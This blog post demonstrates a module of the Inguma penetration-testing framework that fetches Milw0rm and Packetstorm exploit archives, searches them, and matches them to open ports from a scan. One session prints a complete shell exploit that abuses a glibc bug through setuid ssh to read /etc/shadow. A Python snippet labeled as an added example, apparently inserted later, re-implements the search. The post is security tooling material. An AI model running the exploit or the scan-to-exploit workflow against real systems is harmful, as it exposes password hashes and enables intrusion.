Thursday 15 January 2009

Exploits for all!

It's been a while since my last post, as always ;), and today we are going to see a new module that almost every Inguma user has been waiting for.

Actually the Inguma development team is just two people and the project is still young and lacks many features, but one of them is more necessary than the rest: exploits. Inguma itself requires lots of development, so we can't spend much more time writing exploits, but with this module I will try to solve this problem a little.

The new module, called 'localxpl' (local exploits), will allow Inguma to download and manage exploits from two important exploit repositories: Milw0rm and Packetstorm. Let's see it in action to find out what this new module can do and how. The module can be found under the category 'exploits', and once you type 'localxpl' you enter its interface:
inguma> show exploits

List of exploit modules
-----------------------

(...)
localxpl      A Module to fetch and manage exploits from many sources
(...)

inguma> localxpl
Exploits from Milw0rm not yet downloaded
Exploits from Packetstorm not yet downloaded

Actual remotedb selected: milw0rm
LOCXPL>

We can see that it informs us that we haven't downloaded any exploits yet and that, by default, the repository to work with is milw0rm. To see the options we just type 'help':
LOCXPL> help

Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb
help                         Show this help
exit                         Exits the DDBB

As we have no local repository yet, only a few options are shown: select the repository to fetch from (milw0rm or packetstorm) and download the exploits from the selected repository. As we have no other choice with milw0rm selected, let's download the exploits with the command 'fetch' and see the new options:
LOCXPL> fetch
Dir:  /inguma/modules/exploits/
Downloading  http://www.milw0rm.com/sploits/milw0rm.tar.bz2
Extracting files...
Exploits successfully downloaded on Thu Jan 15 20:19:38 2009
Operation Complete

Now we know that the exploits are stored under the directory 'exploits' and that the download finished fine; the path where the exploits are stored can be changed easily in the source of the module. Type 'help' again to see the new options:
Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb

Manage Milw0rm DDBB commands
----------------------------

list                         Shows list of local exploits. VERY VERBOSE
search                       Search exploits; use the 'tag' variable
Example: to search for windows exploits
'tag Windows'
rport                        Shows exploits afecting a remote port
Define the port using command 'port 22'
Port must be numeric: 22 intead of SSH
correlate                    Searches the DDBB for all exploits matching rport
for all the ports of a scaned machine. Specify
target machine with 'target 192.168.0.1'
Be sure to scan the machine before!
show                         Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'

help                         Show this help
exit                         Exits the DDBB

Now that we have some exploits downloaded we have some more operations to perform on them. For example we can list all the exploits downloaded from milw0rm just by typing 'list', but this will output lots of them, so... We can also search all the exploits for a given keyword by setting it with the command 'tag' and then running 'search':
LOCXPL> tag openssh
New search tag:  openssh
LOCXPL> search
Searching milw0rm local DDBB for tag: openssh
./platforms/linux/local/258.sh glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x

We got one match for an exploit related to 'OpenSSH', and now we can get more information just by displaying its contents: set the path to the exploit using the command 'xplpath' with the path you got from the search results, and type 'show':
LOCXPL> xplpath ./modules/exploits/milw0rm/platforms/linux/local/258.sh
./modules/exploits/milw0rm/platforms/linux/local/258.sh set to show.

LOCXPL> show
# Charles Stevenson 
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path

ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow        # File to read
###############################################################################

echo "$ssh"
echo "[*] Checking permisions..."

if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi

export RESOLV_HOST_CONF=$FILE

echo "[*] Glibc bug found by Charles Stevenson "
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export  RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv |  cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '

# milw0rm.com [2001-01-25]

Another option is to list all the exploits affecting a given remote port using the command 'rport' after specifying the remote port with the command 'port', as explained in the help; the command 'correlate' will be shown later in this post.

Now that we have seen what we can do with the Milw0rm repository, let's see what we can do with Packetstorm; first we switch to packetstorm with the command 'remotedb' and type 'help':
LOCXPL> remotedb packetstorm
New remotedb selected:  packetstorm
LOCXPL> help

Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb
years                        A space separated list of years to fetch
Example: 'years 06 07 08'
help                         Show this help
exit                         Exits the DDBB

As with milw0rm, until we fetch the exploits we have few choices. But now there is one difference: packetstorm classifies its exploits by year, so we can specify the years we want to fetch with the command 'years'; by default the exploits from the years 2007/08 will be downloaded.
LOCXPL> years 08
Years:  ['08']
LOCXPL> fetch
Dir:  /inguma/modules/exploits/packetstorm/
Start: 2008
Downloading: http://packetstormsecurity.org/0812-exploits/2008-exploits.tgz ...
Done. Extracting files...
Done: 2008
Exploits successfully downloaded on Thu Jan 15 20:28:44 2009

Almost the same as with milw0rm so far. From now on, if we fetch exploits from milw0rm or packetstorm again they will be updated, and if we specify 'years 07 08' and fetch again, only the exploits of the year 2007 will be downloaded (2008 is already present). So let's see the new options we now have for the packetstorm repository:
Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb
years                        A space separated list of years to fetch
Example: 'years 06 07 08'

Manage Packetstorm DDBB commands
--------------------------------

list                         Shows list of local exploits. VERY VERBOSE
Also navigate the exploits listing going with
your browser to, for example:
/inguma/modules/exploits/packetstorm/08-exploits/0801-exploits/index.html
search                       Search exploits; use the 'tag' variable
Example: to search for windows exploits
Example: 'tag Windows Vista'
Optionaly append a year to search only on exploits of this year
Example: 'year 08'
show                         Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'

help                         Show this help
exit                         Exits the DDBB

As we can see, the options are almost the same as we have with milw0rm, but here we can't search by port; if we look at the help of the command 'list' we can see that we can browse the exploits of this repository by opening the file index.html that exists in each directory of the repository, just changing the year and month in the path.

And the last command we are going to see is 'correlate', which we can find in the milw0rm help. With this command we can automatically search for all the exploits that may affect the ports reported open by the port scans. So, the first thing we need to do is a port scan:
inguma> target = '192.168.0.1'
inguma> tcpscan
Scanning port 17004 (417/417)
Open ports
----------

Port 1720 is open
Port 23/telnet is open

Once we get the open ports for this target we enter the 'localxpl' interface to correlate the results with the existing exploits. As we have already downloaded the exploits, we are now informed of the dates of the downloads, so we can decide whether we need to update.
inguma> localxpl
Last Milw0rm DDBB update: Thu Jan 15 20:19:38 2009
Last Packetstorm DDBB update: Thu Jan 15 20:28:44 2009

Actual remotedb selected: milw0rm

Now we just need to specify the scanned target we want to correlate and launch the command 'correlate':
LOCXPL> target 192.168.0.1
Target set for correlation: 192.168.0.1

LOCXPL> correlate
Searching exploits available on milw0rm DDBB for port TCP/23

/inguma/modules/exploits/milw0rm/rport/23/346.c
/inguma/modules/exploits/milw0rm/rport/23/3293.sh
/inguma/modules/exploits/milw0rm/rport/23/254.c
/inguma/modules/exploits/milw0rm/rport/23/621.c
/inguma/modules/exploits/milw0rm/rport/23/89.c
/inguma/modules/exploits/milw0rm/rport/23/409.c

Searching exploits available on milw0rm DDBB for port TCP/1720

No exploits found for port TCP/1720

Ok, this is not enough to get accurate results (matching by port number alone says nothing about the service or version actually listening), but it's a starting point until I improve the scanning modules to also get and store information about the services listening on each port; for now, that's all we have.
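To make the 'search' and 'correlate' lookups above concrete, here is an added example (not Inguma's own code) that re-implements both over a local exploit repository laid out like the one shown in this post, with port-indexed exploits under rport/<port>/; the repository contents are constructed sample files, and the function names are my own.

```python
# Added example, not Inguma's code: tag search and port correlation over a
# local exploit tree laid out like milw0rm's (rport/<port>/<file>).
import os
import tempfile

def search_by_tag(repo, tag):
    """Return repo-relative paths of files whose text contains `tag` (case-insensitive)."""
    hits = []
    for root, _dirs, files in os.walk(repo):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    if tag.lower() in fh.read().lower():
                        hits.append(os.path.relpath(path, repo))
            except OSError:
                continue  # unreadable file: skip it rather than abort the search
    return sorted(hits)

def correlate(repo, open_ports):
    """Map each scanned open port to the exploits indexed under rport/<port>/.
    A port with no directory maps to [] (the tool prints 'No exploits found')."""
    result = {}
    for port in open_ports:
        port_dir = os.path.join(repo, "rport", str(port))
        if os.path.isdir(port_dir):
            result[port] = sorted(os.path.join(port_dir, f) for f in os.listdir(port_dir))
        else:
            result[port] = []
    return result

def build_sample_repo():
    """Constructed sample repository mimicking the layout seen in the post."""
    repo = tempfile.mkdtemp(prefix="localxpl_")
    files = {  # constructed placeholder contents, not real exploit code
        "platforms/linux/local/258.sh": "# glibc-2.2 and openssh-2.3.0p1\n",
        "rport/23/346.c": "/* telnet-related sample */\n",
        "rport/23/3293.sh": "# telnet-related sample\n",
        "rport/22/100.c": "/* OpenSSH-related sample */\n",
    }
    for rel, body in files.items():
        full = os.path.join(repo, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return repo

if __name__ == "__main__":
    repo = build_sample_repo()
    print(search_by_tag(repo, "openssh"))            # matches 258.sh and rport/22/100.c
    for port, xpls in correlate(repo, [23, 1720]).items():
        print(f"TCP/{port}:", xpls or "No exploits found")
```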

So that's all folks; I hope to improve this module soon and also add new interesting ones. To finish, a hint about my next module: PIG. ;)
